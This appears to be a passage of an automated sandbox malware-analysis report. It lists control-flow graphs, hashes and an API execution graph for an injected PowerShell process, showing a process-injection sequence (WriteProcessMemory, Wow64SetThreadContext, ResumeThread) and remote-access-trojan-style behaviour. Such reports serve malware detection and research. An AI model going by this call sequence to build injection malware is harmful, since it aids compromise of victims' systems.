                                                                                  control_flow_graph 127 7ff848da6c55-7ff848da6cde 133 7ff848da6ce4-7ff848da6cee 127->133 134 7ff848da6e4b-7ff848da6e61 127->134 135 7ff848da6cf0-7ff848da6d06 133->135 136 7ff848da6d08-7ff848da6d12 133->136 140 7ff848da6e63-7ff848da6e67 134->140 141 7ff848da6e69-7ff848da6ea0 134->141 135->136 136->134 139 7ff848da6d18-7ff848da6d22 136->139 142 7ff848da6d24-7ff848da6d39 139->142 143 7ff848da6d3b-7ff848da6d42 139->143 140->141 147 7ff848da6e43-7ff848da6e48 141->147 148 7ff848da6ea2-7ff848da6ed6 141->148 142->143 143->134 145 7ff848da6d48-7ff848da6d52 143->145 149 7ff848da6d54-7ff848da6d64 145->149 150 7ff848da6d68-7ff848da6d8b 145->150 156 7ff848da6fd8-7ff848da701b 148->156 157 7ff848da6edc-7ff848da6ee6 148->157 149->150 150->134 158 7ff848da6d91-7ff848da6d9b 150->158 171 7ff848da701d-7ff848da7024 156->171 159 7ff848da6ee8-7ff848da6efd 157->159 160 7ff848da6eff-7ff848da6f2e 157->160 161 7ff848da6db1-7ff848da6deb 158->161 162 7ff848da6d9d-7ff848da6dae 158->162 159->160 160->156 176 7ff848da6f34-7ff848da6f3e 160->176 161->134 175 7ff848da6ded-7ff848da6df7 161->175 162->161 174 7ff848da7025-7ff848da7028 171->174 177 7ff848da6fcb-7ff848da6fd7 174->177 178 7ff848da702a-7ff848da7041 174->178 179 7ff848da6df9-7ff848da6e0c 175->179 180 7ff848da6e0d-7ff848da6e42 175->180 181 7ff848da6f40-7ff848da6f4d 176->181 182 7ff848da6f57-7ff848da6fb7 176->182 178->171 184 7ff848da7043-7ff848da7049 178->184 179->180 180->147 181->182 190 7ff848da6f4f-7ff848da6f55 181->190 182->177 201 7ff848da6fb9-7ff848da6fca 182->201 184->174 192 7ff848da704b-7ff848da70da 184->192 190->182 208 7ff848da70e1-7ff848da70e5 192->208 201->177 209 7ff848da70ed-7ff848da7105 208->209
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H}H
                                                                                  • API String ID: 0-989461704
                                                                                  • Opcode ID: b0878dc1e9a6290a96615bd52baad03e4032938e4f26f1eeba745d95b5ad0ba2
                                                                                  • Instruction ID: c20282d0d8115cea26e192008aafc69872ec698cfe0b0451daa2403f0a1ad1cd
                                                                                  • Opcode Fuzzy Hash: b0878dc1e9a6290a96615bd52baad03e4032938e4f26f1eeba745d95b5ad0ba2
                                                                                  • Instruction Fuzzy Hash: 7EF1E52190EBC58FE79AA73898656703BE1EF56250F2940FEC089CB1E3DE19DC4AC355
                                                                                  Function 00007FF848CDBA7F Relevance: 1.8, APIs: 1, Instructions: 305processCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 89381c6b3dd415e7137b5778a5c25abd424277e277f0cf219466f6dc51c9112c
                                                                                  • Instruction ID: e0336877430209525b3d6230872def9b5f46378c681fa377c1b810bb9089cf06
                                                                                  • Opcode Fuzzy Hash: 89381c6b3dd415e7137b5778a5c25abd424277e277f0cf219466f6dc51c9112c
                                                                                  • Instruction Fuzzy Hash: 79A18B3190CA9C8FDBA5EF588845AE9BBF0FF59310F1442AAD449E7251CB34A985CF81
                                                                                  Function 00007FF848CDBAD8 Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: be098bcd660a11dcdb5f3941d762800000640927cf23ca4df29eaadc60390254
                                                                                  • Instruction ID: 4d7706dd97d3c060436327cbdab491d05c364b9b4d2ede7093c26ba05c5fa7af
                                                                                  • Opcode Fuzzy Hash: be098bcd660a11dcdb5f3941d762800000640927cf23ca4df29eaadc60390254
                                                                                  • Instruction Fuzzy Hash: A4815971D1CA5C8FDBA8EF58D845AE9B7F1FB98310F0042AAD40DE3251CB30A9858F81
                                                                                  Function 00007FF848CDBD66 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 259 7ff848cdbd66-7ff848cdbd8a 260 7ff848cdbda2-7ff848cdbdaa 259->260 261 7ff848cdbd8c-7ff848cdbd9e 259->261 263 7ff848cdbdc3-7ff848cdbdd3 260->263 264 7ff848cdbdac-7ff848cdbdbd 260->264 265 7ff848cdbda1 261->265 266 7ff848cdbdff-7ff848cdbe75 261->266 264->263 265->260 270 7ff848cdbe77-7ff848cdbe7c 266->270 271 7ff848cdbe7f-7ff848cdbeb1 Wow64SetThreadContext 266->271 270->271 272 7ff848cdbeb3 271->272 273 7ff848cdbeb9-7ff848cdbee0 271->273 272->273
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e5c25489585cbb4ca0a99fb9b5b8cb3ff1358ca643d567e876520456786e43d
                                                                                  • Instruction ID: da221f09c8da60f26530e8bee2595479ec39da11d46da77f5462af7617f1e94e
                                                                                  • Opcode Fuzzy Hash: 1e5c25489585cbb4ca0a99fb9b5b8cb3ff1358ca643d567e876520456786e43d
                                                                                  • Instruction Fuzzy Hash: 5C41243190CB5C8FEBA9EF58D849AFA7BE0FB95320F04416BD009C3156DB34A846CB91
                                                                                  Function 00007FF848CDC0E4 Relevance: 1.6, APIs: 1, Instructions: 138injectionCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 274 7ff848cdc0e4-7ff848cdc0eb 275 7ff848cdc0f6-7ff848cdc180 274->275 276 7ff848cdc0ed-7ff848cdc0f5 274->276 278 7ff848cdc182-7ff848cdc187 275->278 279 7ff848cdc18a-7ff848cdc1cf WriteProcessMemory 275->279 276->275 278->279 280 7ff848cdc1d7-7ff848cdc201 279->280 281 7ff848cdc1d1 279->281 281->280
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: f67fc7b614b7d3bc46314fc06ba85a6a71cd6b629543fc86796220ce1f504698
                                                                                  • Instruction ID: 9b6e695caa20ae57c6ae64efaf72552a996eb5fd7aeaa3b0ec4c8fa47496beb9
                                                                                  • Opcode Fuzzy Hash: f67fc7b614b7d3bc46314fc06ba85a6a71cd6b629543fc86796220ce1f504698
                                                                                  • Instruction Fuzzy Hash: 6341E67090CB588FDB18EF5898496E9BBE0EB59311F04426FE489D3252CB74A845CB96
                                                                                  Function 00007FF848CDBDD5 Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 282 7ff848cdbdd5-7ff848cdbde1 283 7ff848cdbde3-7ff848cdbdeb 282->283 284 7ff848cdbdec-7ff848cdbe75 282->284 283->284 287 7ff848cdbe77-7ff848cdbe7c 284->287 288 7ff848cdbe7f-7ff848cdbeb1 Wow64SetThreadContext 284->288 287->288 289 7ff848cdbeb3 288->289 290 7ff848cdbeb9-7ff848cdbee0 288->290 289->290
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 5f7a41b27392c3b591d48d9eb4d03f9e408657401b1dbec6dc077b3735c2ac97
                                                                                  • Instruction ID: 9948ec0ab0ecbc766fa4358a93e83bfee71212e91de3a356015b115cc329e279
                                                                                  • Opcode Fuzzy Hash: 5f7a41b27392c3b591d48d9eb4d03f9e408657401b1dbec6dc077b3735c2ac97
                                                                                  • Instruction Fuzzy Hash: 1F41063190D7988FDB56EF6888857E97FE0EF56320F08429BD048C7196DB64A405CB92
                                                                                  Function 00007FF848CDC205 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 291 7ff848cdc205-7ff848cdc211 292 7ff848cdc213-7ff848cdc21b 291->292 293 7ff848cdc21c-7ff848cdc2a9 ResumeThread 291->293 292->293 296 7ff848cdc2b1-7ff848cdc2cd 293->296 297 7ff848cdc2ab 293->297 297->296
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: d5dc37ad8a15f90cc92dd4d5a45dbd970c5754dc373682686f3f4cb03f649ffa
                                                                                  • Instruction ID: 51e9670688e7556820d1a5486d9be7d4fe34e64ef89658bd6edec1ac1269150d
                                                                                  • Opcode Fuzzy Hash: d5dc37ad8a15f90cc92dd4d5a45dbd970c5754dc373682686f3f4cb03f649ffa
                                                                                  • Instruction Fuzzy Hash: 2A21E33090CA4C8FDB59EB589849BE9BBE0FB56320F04425FD049C3692C7606416CB81
                                                                                  Function 00007FF848DA0313 Relevance: .2, Instructions: 235COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 298 7ff848da0313-7ff848da0319 300 7ff848da0344-7ff848da0371 298->300 301 7ff848da031b-7ff848da0342 298->301 307 7ff848da0373 300->307 308 7ff848da0374-7ff848da0385 300->308 301->300 307->308 310 7ff848da0387 308->310 311 7ff848da0388-7ff848da0417 308->311 310->311 315 7ff848da041d-7ff848da0427 311->315 316 7ff848da056f-7ff848da05c1 311->316 317 7ff848da0443-7ff848da0450 315->317 318 7ff848da0429-7ff848da0441 315->318 331 7ff848da0565-7ff848da056c 316->331 324 7ff848da0510-7ff848da051a 317->324 325 7ff848da0456-7ff848da0459 317->325 318->317 327 7ff848da0529-7ff848da0563 324->327 328 7ff848da051c-7ff848da0528 324->328 325->324 329 7ff848da045f-7ff848da0467 325->329 327->331 329->316 333 7ff848da046d-7ff848da0477 329->333 331->316 335 7ff848da0490-7ff848da0494 333->335 336 7ff848da0479-7ff848da048e 333->336 335->324 339 7ff848da0496-7ff848da0499 335->339 336->335 340 7ff848da04c0 339->340 341 7ff848da049b-7ff848da04be 339->341 343 7ff848da04c2-7ff848da04c4 340->343 341->343 343->324 345 7ff848da04c6-7ff848da04d9 343->345 348 7ff848da04e0-7ff848da04e9 345->348 349 7ff848da0502-7ff848da050f 348->349 350 7ff848da04eb-7ff848da04f8 348->350 350->349 352 7ff848da04fa-7ff848da0500 350->352 352->349
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4c76ee228a3878d3067ec046119ad61c137471171b8815f93e5d9d641629fe83
                                                                                  • Instruction ID: 7896c69e56fc68b68042091c50ec4430c0eeee0293adb87998710b6b3d27cfa4
                                                                                  • Opcode Fuzzy Hash: 4c76ee228a3878d3067ec046119ad61c137471171b8815f93e5d9d641629fe83
                                                                                  • Instruction Fuzzy Hash: FC71E121E0EBC98FE796BB284868374BFE0EF56254F5801FAD048CB193EA599C49C345
                                                                                  Function 00007FF848DA919E Relevance: .2, Instructions: 225COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77cf53d052685621578c2c199f9e2a812e48f825f62978f12ea1b8bb8d63f8ce
                                                                                  • Instruction ID: ca8f7650f1d6d25223bc1e48881b37d68b43dbe17961a147a7231b58ed2c8965
                                                                                  • Opcode Fuzzy Hash: 77cf53d052685621578c2c199f9e2a812e48f825f62978f12ea1b8bb8d63f8ce
                                                                                  • Instruction Fuzzy Hash: 8D610B22E0FF865FEB96A67C14553B9B6D1EF556A0F9801BAC01EC31D7DF089C098349
                                                                                  Function 00007FF848DA077C Relevance: .2, Instructions: 154COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 599592e2b41bd0b37d10a8e2f48ba12bcfab88ee9f899ffe27c5beabbbe0d293
                                                                                  • Instruction ID: b6f3c9e213ba6896dd0abd0af95d46f0888db13f44092a98daaba9c19844da70
                                                                                  • Opcode Fuzzy Hash: 599592e2b41bd0b37d10a8e2f48ba12bcfab88ee9f899ffe27c5beabbbe0d293
                                                                                  • Instruction Fuzzy Hash: A0418572A0DB898FEB54BF1CA4422B87BE0EF55760F1401ABD549C3192D725AC45C7C5
                                                                                  Function 00007FF848DA91EA Relevance: .1, Instructions: 143COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eaa85dfc12a67904d34276a7d32a4d7a4e95da6fd3da2cd4fb46c64c0b811903
                                                                                  • Instruction ID: 463809b459446a5c595fd8ff144044f1aec35fd9d55beb94d037a381b9d6728a
                                                                                  • Opcode Fuzzy Hash: eaa85dfc12a67904d34276a7d32a4d7a4e95da6fd3da2cd4fb46c64c0b811903
                                                                                  • Instruction Fuzzy Hash: F341D822E5FB872FF79BA66C1455378B6D1EF952A0FA801BAD42DC31D6DF0C9C094209

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.5%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:14.7%
                                                                                  Total number of Nodes:1317
                                                                                  Total number of Limit Nodes:57
                                                                                  execution_graph 45897 42d6a2 45898 42d6ad 45897->45898 45899 42d6c1 45898->45899 45901 430ca3 45898->45901 45902 430cb2 45901->45902 45903 430cae 45901->45903 45905 43b6c1 45902->45905 45903->45899 45906 443697 45905->45906 45907 4436a4 45906->45907 45908 4436af 45906->45908 45918 443649 45907->45918 45910 4436b7 45908->45910 45916 4436c0 ___crtLCMapStringA 45908->45916 45925 443c92 20 API calls _free 45910->45925 45911 4436c5 45926 43ad91 20 API calls _free 45911->45926 45912 4436ea HeapReAlloc 45915 4436ac 45912->45915 45912->45916 45915->45903 45916->45911 45916->45912 45927 440480 7 API calls 2 library calls 45916->45927 45919 443687 45918->45919 45924 443657 ___crtLCMapStringA 45918->45924 45929 43ad91 20 API calls _free 45919->45929 45921 443672 RtlAllocateHeap 45922 443685 45921->45922 45921->45924 45922->45915 45924->45919 45924->45921 45928 440480 7 API calls 2 library calls 45924->45928 45925->45915 45926->45915 45927->45916 45928->45924 45929->45922 45930 424a00 45935 424a7d send 45930->45935 45936 41bd72 45938 41bd87 _Yarn ___scrt_fastfail 45936->45938 45937 41bf8a 45944 41bf3e 45937->45944 45950 41b917 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 45937->45950 45938->45937 45955 430c79 21 API calls _Yarn 45938->45955 45941 41bf9b 45941->45944 45951 430c79 21 API calls _Yarn 45941->45951 45943 41bf37 ___scrt_fastfail 45943->45944 45956 430c79 21 API calls _Yarn 45943->45956 45946 41bfd4 ___scrt_fastfail 45946->45944 45952 4312ff 45946->45952 45948 41bf64 ___scrt_fastfail 45948->45944 45957 430c79 21 API calls _Yarn 45948->45957 45950->45941 45951->45946 45958 43121e 45952->45958 45954 431307 45954->45944 45955->45943 45956->45948 45957->45937 45959 431237 45958->45959 45963 43122d 45958->45963 45959->45963 45964 430c79 21 API calls _Yarn 45959->45964 45961 431258 45961->45963 45965 4315ec CryptAcquireContextA 45961->45965 45963->45954 45964->45961 45966 431608 45965->45966 45967 43160d CryptGenRandom 45965->45967 45966->45963 45967->45966 45968 431622 CryptReleaseContext 45967->45968 45968->45966 45969 424991 45975 424a66 recv 45969->45975 45976 439be8 45978 439bf4 _swprintf ___scrt_is_nonwritable_in_current_image 45976->45978 45977 439c02 45992 43ad91 20 API calls _free 45977->45992 45978->45977 45981 439c2c 45978->45981 45980 439c07 pre_c_initialization ___scrt_is_nonwritable_in_current_image 45987 442d9a EnterCriticalSection 45981->45987 45983 439c37 45988 439cd8 45983->45988 45987->45983 45989 439ce6 45988->45989 45989->45989 45991 439c42 45989->45991 45994 446c9b 36 API calls 2 library calls 45989->45994 45993 439c5f LeaveCriticalSection std::_Lockit::~_Lockit 45991->45993 45992->45980 45993->45980 45994->45989 45995 40163e 45996 401646 45995->45996 45997 401649 45995->45997 45998 401688 45997->45998 46000 401676 45997->46000 46003 43229f 45998->46003 46002 43229f new 22 API calls 46000->46002 46001 40167c 46002->46001 46006 4322a4 46003->46006 46005 4322d0 46005->46001 46006->46005 46010 439adb 46006->46010 46017 440480 7 API calls 2 library calls 46006->46017 46018 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46006->46018 46019 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46006->46019 46016 443649 ___crtLCMapStringA 46010->46016 46011 443687 46021 43ad91 20 API calls _free 46011->46021 46013 443672 RtlAllocateHeap 46014 443685 46013->46014 46013->46016 46014->46006 46016->46011 46016->46013 46020 440480 7 API calls 2 library calls 46016->46020 46017->46006 46020->46016 46021->46014 46022 43263c 46023 432648 ___scrt_is_nonwritable_in_current_image 46022->46023 46049 43234b 46023->46049 46025 43264f 46027 432678 46025->46027 46319 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46025->46319 46032 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46027->46032 46320 441763 5 API calls CatchGuardHandler 46027->46320 46029 432691 46031 432697 ___scrt_is_nonwritable_in_current_image 46029->46031 46321 441707 5 API calls CatchGuardHandler 46029->46321 46039 432717 46032->46039 46322 4408e7 35 API calls 4 library calls 46032->46322 46060 4328c9 46039->46060 46050 432354 46049->46050 46327 4329da IsProcessorFeaturePresent 46050->46327 46052 432360 46328 436cd1 10 API calls 4 library calls 46052->46328 46054 432365 46059 432369 46054->46059 46329 4415bf 46054->46329 46057 432380 46057->46025 46059->46025 46388 434c30 46060->46388 46063 43271d 46064 4416b4 46063->46064 46390 44c239 46064->46390 46066 432726 46069 40d3f0 46066->46069 46067 4416bd 46067->46066 46394 443d25 35 API calls 46067->46394 46396 41a8da LoadLibraryA GetProcAddress 46069->46396 46071 40d40c 46403 40dd83 46071->46403 46073 40d415 46418 4020d6 46073->46418 46076 4020d6 28 API calls 46077 40d433 46076->46077 46424 419d87 46077->46424 46081 40d445 46450 401e6d 46081->46450 46083 40d44e 46084 40d461 46083->46084 46085 40d4b8 46083->46085 46713 40e609 116 API calls 46084->46713 46456 401e45 46085->46456 46088 40d4c6 46092 401e45 22 API calls 46088->46092 46089 40d473 46090 401e45 22 API calls 46089->46090 46091 40d47f 46090->46091 46714 40f98d 36 API calls __EH_prolog 46091->46714 46093 40d4e5 46092->46093 46461 4052fe 46093->46461 46096 40d4f4 46466 408209 46096->46466 46097 40d491 46715 40e5ba 77 API calls 46097->46715 46101 40d49a 46716 40dd70 70 API calls 46101->46716 46110 401fb8 11 API calls 46111 40d520 46110->46111 46112 401e45 22 API calls 46111->46112 46113 40d529 46112->46113 46483 401fa0 46113->46483 46115 40d534 46116 401e45 22 API calls 46115->46116 46117 40d54f 46116->46117 46118 401e45 22 API calls 46117->46118 46119 40d569 46118->46119 46120 40d5cf 46119->46120 46487 40822a 46119->46487 46121 401e45 22 API calls 46120->46121 46127 40d5dc 46121->46127 46123 40d594 46124 401fc2 28 API calls 46123->46124 46125 40d5a0 46124->46125 46128 401fb8 11 API calls 46125->46128 46126 40d650 46132 40d660 CreateMutexA GetLastError 46126->46132 46127->46126 46130 401e45 22 API calls 46127->46130 46129 40d5a9 46128->46129 46492 411f34 RegOpenKeyExA 46129->46492 46131 40d5f5 46130->46131 46137 40d5fc OpenMutexA 46131->46137 46133 40d991 46132->46133 46134 40d67f GetModuleFileNameW 46132->46134 46135 401fb8 11 API calls 46133->46135 46495 4192ae 46134->46495 46162 40d99a ___scrt_fastfail 46135->46162 46141 40d622 46137->46141 46142 40d60f WaitForSingleObject CloseHandle 46137->46142 46145 411f34 3 API calls 46141->46145 46142->46141 46143 40d6a0 46146 40d6f5 46143->46146 46147 401e45 22 API calls 46143->46147 46144 40dd0f 46787 41239a 30 API calls 46144->46787 46153 40d63b 46145->46153 46149 401e45 22 API calls 46146->46149 46157 40d6bf 46147->46157 46151 40d720 46149->46151 46150 40dd22 46788 410eda 65 API calls ___scrt_fastfail 46150->46788 46154 40d731 46151->46154 46155 40d72c 46151->46155 46153->46126 46717 41239a 30 API calls 46153->46717 46159 401e45 22 API calls 46154->46159 46721 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46155->46721 46157->46146 46163 40d6f7 46157->46163 46167 40d6db 46157->46167 46169 40d73a 46159->46169 46160 402073 28 API calls 46161 40dd3a 46160->46161 46622 4052dd 46161->46622 46783 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46162->46783 46719 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 46163->46719 46166 40dd4a 46168 402073 28 API calls 46166->46168 46167->46146 46718 4067a0 36 API calls ___scrt_fastfail 46167->46718 46172 40dd59 46168->46172 46176 401e45 22 API calls 46169->46176 46175 4194da 79 API calls 46172->46175 46173 40d70d 46173->46146 46177 40d712 46173->46177 46174 40d9ec 46178 401e45 22 API calls 46174->46178 46179 40dd5e 46175->46179 46180 40d755 46176->46180 46720 4066a6 58 API calls 46177->46720 46182 40da10 46178->46182 46183 401fb8 11 API calls 46179->46183 46186 401e45 22 API calls 46180->46186 46522 402073 46182->46522 46184 40dd6a 46183->46184 46624 413980 46184->46624 46189 40d76f 46186->46189 46188 40dd6f 46191 401e45 22 API calls 46189->46191 46190 40da22 46528 41215f RegCreateKeyA 46190->46528 46192 40d789 46191->46192 46196 401e45 22 API calls 46192->46196 46195 401e45 22 API calls 46197 40da44 46195->46197 46201 40d7a3 46196->46201 46534 439867 46197->46534 46200 40d810 46200->46162 46204 40d828 46200->46204 46241 40d8a7 ___scrt_fastfail 46200->46241 46201->46200 46203 401e45 22 API calls 46201->46203 46202 40da61 46784 41aa4f 81 API calls ___scrt_fastfail 46202->46784 46213 40d7b8 _wcslen 46203->46213 46206 401e45 22 API calls 46204->46206 46205 40da7e 46208 402073 28 API calls 46205->46208 46209 40d831 46206->46209 46211 40da8d 46208->46211 46215 401e45 22 API calls 46209->46215 46210 40da70 CreateThread 46210->46205 47556 41b212 10 API calls 46210->47556 46212 402073 28 API calls 46211->46212 46214 40da9c 46212->46214 46213->46200 46217 401e45 22 API calls 46213->46217 46538 4194da 46214->46538 46218 40d843 46215->46218 46221 40d7d3 46217->46221 46223 401e45 22 API calls 46218->46223 46220 401e45 22 API calls 46222 40daad 46220->46222 46224 401e45 22 API calls 46221->46224 46226 401e45 22 API calls 46222->46226 46225 40d855 46223->46225 46227 40d7e8 46224->46227 46229 401e45 22 API calls 46225->46229 46228 40dabf 46226->46228 46722 40c5ed 46227->46722 46232 401e45 22 API calls 46228->46232 46230 40d87e 46229->46230 46236 401e45 22 API calls 46230->46236 46234 40dad5 46232->46234 46240 401e45 22 API calls 46234->46240 46235 401ef3 28 API calls 46237 40d807 46235->46237 46238 40d88f 46236->46238 46239 401ee9 11 API calls 46237->46239 46780 40b871 46 API calls _wcslen 46238->46780 46239->46200 46242 40daf5 46240->46242 46512 412338 46241->46512 46247 439867 _strftime 39 API calls 46242->46247 46245 40d942 ctype 46250 401e45 22 API calls 46245->46250 46246 40d89f 46246->46241 46248 40db02 46247->46248 46249 401e45 22 API calls 46248->46249 46251 40db0d 46249->46251 46252 40d959 46250->46252 46253 401e45 22 API calls 46251->46253 46252->46174 46254 40d96d 46252->46254 46255 40db1e 46253->46255 46256 401e45 22 API calls 46254->46256 46562 408f1f 46255->46562 46257 40d976 46256->46257 46781 419bca 28 API calls 46257->46781 46260 40d982 46782 40de34 95 API calls 46260->46782 46263 401e45 22 API calls 46265 40db3c 46263->46265 46264 40d987 46264->46133 46264->46174 46266 40db83 46265->46266 46267 40db4a 46265->46267 46269 401e45 22 API calls 46266->46269 46268 43229f new 22 API calls 46267->46268 46270 40db53 46268->46270 46271 40db91 46269->46271 46272 401e45 22 API calls 46270->46272 46274 40dbd9 46271->46274 46275 40db9c 46271->46275 46273 40db65 46272->46273 46277 40db6c CreateThread 46273->46277 46276 401e45 22 API calls 46274->46276 46278 43229f new 22 API calls 46275->46278 46279 40dbe2 46276->46279 46277->46266 47557 417f6a 101 API calls 2 library calls 46277->47557 46280 40dba5 46278->46280 46283 40dc4c 46279->46283 46284 40dbed 46279->46284 46281 401e45 22 API calls 46280->46281 46282 40dbb6 46281->46282 46285 40dbbd CreateThread 46282->46285 46286 401e45 22 API calls 46283->46286 46287 401e45 22 API calls 46284->46287 46285->46274 47560 417f6a 101 API calls 2 library calls 46285->47560 46288 40dc55 46286->46288 46289 40dbfc 46287->46289 46290 40dc60 46288->46290 46291 40dc99 46288->46291 46292 401e45 22 API calls 46289->46292 46294 401e45 22 API calls 46290->46294 46599 4195f8 GetComputerNameExW GetUserNameW 46291->46599 46295 40dc11 46292->46295 46297 40dc69 46294->46297 46785 40c5a1 31 API calls 46295->46785 46301 401e45 22 API calls 46297->46301 46304 40dc7e 46301->46304 46302 40dc24 46305 401ef3 28 API calls 46302->46305 46315 439867 _strftime 39 API calls 46304->46315 46307 40dc30 46305->46307 46312 401ee9 11 API calls 46307->46312 46308 40dcc1 SetProcessDEPPolicy 46309 40dcc4 CreateThread 46308->46309 46310 40dce5 46309->46310 46311 40dcd9 CreateThread 46309->46311 47529 40e18d 46309->47529 46313 40dcfa 46310->46313 46314 40dcee CreateThread 46310->46314 46311->46310 47424 410b5c GetCurrentProcessId 46311->47424 46316 40dc39 CreateThread 46312->46316 46313->46160 46313->46184 46314->46313 47558 411140 38 API calls ___scrt_fastfail 46314->47558 46317 40dc8b 46315->46317 46316->46283 47559 401bc9 49 API calls _strftime 46316->47559 46786 40b0a3 7 API calls 46317->46786 46319->46025 46320->46029 46321->46032 46322->46039 46327->46052 